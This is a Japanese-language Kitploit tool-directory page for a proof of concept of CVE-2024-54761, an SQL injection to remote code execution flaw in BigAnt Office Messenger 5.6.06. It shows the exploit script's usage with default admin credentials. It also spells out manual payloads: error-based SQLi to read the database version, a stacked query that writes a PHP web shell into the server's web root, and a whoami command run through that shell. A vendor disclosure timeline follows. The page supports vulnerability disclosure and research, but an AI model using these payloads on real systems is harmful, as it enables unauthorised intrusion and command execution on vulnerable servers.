Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
ツール/GitHubGitHub/nscan9/cve-2024-54761
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

BigAnt Office Messenger 5.6.06 におけるSQLインジェクション経由のRCE

BigAnt MessengerのSQLインジェクションの脆弱性により、RCEの脆弱性が発生します。以下の手順に従って悪用してください。

使用方法:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

デフォルト認証情報でエクスプロイトを実行します。

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
エクスプロイト

手動エクスプロイト

SQLiにさらされているdev_codeパラメータを使用して、使用されているデータベースのバージョンを抽出します。

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

SQLIバージョン SQLスタッククエリを使用して、ターゲットにPHPウェブシェルをアップロードします。

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

ウェブシェル作成1 コマンド実行の証明:

root@kitploit:~
/shell.php?cmd=whoami

whoami dirコマンド

タイムライン

31-10-2024: メールでベンダーに脆弱性を提出

31-10-2024: ベンダーにメール送信、応答なし

15-11-2024: ベンダーにメール送信、応答なし

15-11-2024: CVEを申請

参照

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

ツールをダウンロード